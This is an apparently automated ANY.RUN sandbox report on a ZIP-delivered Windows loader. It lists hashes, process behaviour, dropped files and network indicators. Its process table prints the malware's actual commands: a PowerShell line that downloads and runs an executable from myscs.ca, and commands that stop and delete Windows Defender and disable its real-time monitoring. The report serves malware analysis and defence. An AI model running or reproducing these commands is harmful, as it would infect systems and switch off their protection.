analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

43843_8439_8329073.zip

Full analysis: https://app.any.run/tasks/ccc11a26-09f1-45d7-8696-b8bd230513bc
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2019, 14:15:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

D2792D5F265ED81ED24CC6659BDF001D

SHA1:

A3812221E1375978D3C32F3042ED521A9743A8C3

SHA256:

A877FEE827DE24D063C2EBBE8D58CFB01135035EAB6DB1818888A4C5398423A4

SSDEEP:

3072:V2LL1qcxZKrh183HPLHviFwsqmJToihMkEXzWEMBgfYSWTi4gTl:VMLkNrhEviwNn+nmKEkW+ol

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Up.exe (PID: 1360)
      • Up.exe (PID: 1256)
      • Wr.exe (PID: 3680)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2628)
      • cmd.exe (PID: 3512)
      • cmd.exe (PID: 3448)
      • cmd.exe (PID: 1868)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2772)
    • Stops/Deletes Windows Defender service

      • cmd.exe (PID: 3212)
      • cmd.exe (PID: 3256)
      • cmd.exe (PID: 1860)
      • cmd.exe (PID: 908)
      • cmd.exe (PID: 2872)
      • cmd.exe (PID: 2408)
      • cmd.exe (PID: 1212)
      • cmd.exe (PID: 2740)
      • cmd.exe (PID: 3464)
      • cmd.exe (PID: 2720)
    • Disables Windows Defender Real-time monitoring

      • Up.exe (PID: 1256)
      • Wr.exe (PID: 3680)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3992)
    • Loads the Task Scheduler COM API

      • Up.exe (PID: 1256)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2772)
      • Up.exe (PID: 1256)
    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 3932)
      • Up.exe (PID: 1360)
      • Up.exe (PID: 1256)
      • Wr.exe (PID: 3680)
    • Creates files in the user directory

      • powershell.exe (PID: 2772)
      • powershell.exe (PID: 324)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2052)
      • Up.exe (PID: 1256)
      • powershell.exe (PID: 2132)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2588)
      • cmd.exe (PID: 1704)
    • Creates files in the program directory

      • Wr.exe (PID: 3680)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 43843_8439_8329073.lnk
ZipUncompressedSize: 140691
ZipCompressedSize: 139299
ZipCRC: 0x6b2fcba6
ZipModifyDate: 2019:05:15 16:46:10
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
88
Monitored processes
38
Malicious processes
10
Suspicious processes
10

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs powershell.exe wordpad.exe no specs up.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs up.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs wr.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs sc.exe no specs sc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3932"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\43843_8439_8329073.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2628"C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2772powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2840"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sysC:\Program Files\windows nt\accessories\wordpad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Wordpad Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1360C:\Users\admin\AppData\Local\Temp/UpC:\Users\admin\AppData\Local\Temp\Up.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3512"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\System32\cmd.exeUp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3212"C:\Windows\System32\cmd.exe" /c sc stop WinDefendC:\Windows\System32\cmd.exeUp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1860"C:\Windows\System32\cmd.exe" /c sc delete WinDefendC:\Windows\System32\cmd.exeUp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
324powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
908/c sc stop WinDefendC:\Windows\system32\cmd.exeUp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 106
Read events
1 755
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
14
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5Y751YMVW5PT65MLAW25.temp
MD5:
SHA256:
324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BI1OE3OC0ZSYRSRCZEYU.temp
MD5:
SHA256:
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IJK8XVJQM4HOK1GQSZWK.temp
MD5:
SHA256:
2052powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TEZJ0FWJEBWSDK3NAI6V.temp
MD5:
SHA256:
2132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4B4KSMJW1TXEVOOR4IY.temp
MD5:
SHA256:
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
324powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1360Up.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2fbinary
MD5:D47262D1325EFFFB2F2CE8F7F5AEEE45
SHA256:ECDAF62FAAE560D3EC835A6361BF579C5FC6655679F860C33412B2BCE5D52BDF
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF138e78.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
powershell.exe
GET
200
69.90.160.255:80
http://myscs.ca/valued_sp3_update.exe
CA
executable
650 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2772
powershell.exe
69.90.160.255:80
myscs.ca
Peer 1 Network (USA) Inc.
CA
suspicious

DNS requests

Domain
IP
Reputation
myscs.ca
  • 69.90.160.255
suspicious

Threats

PID
Process
Class
Message
2772
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2772
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info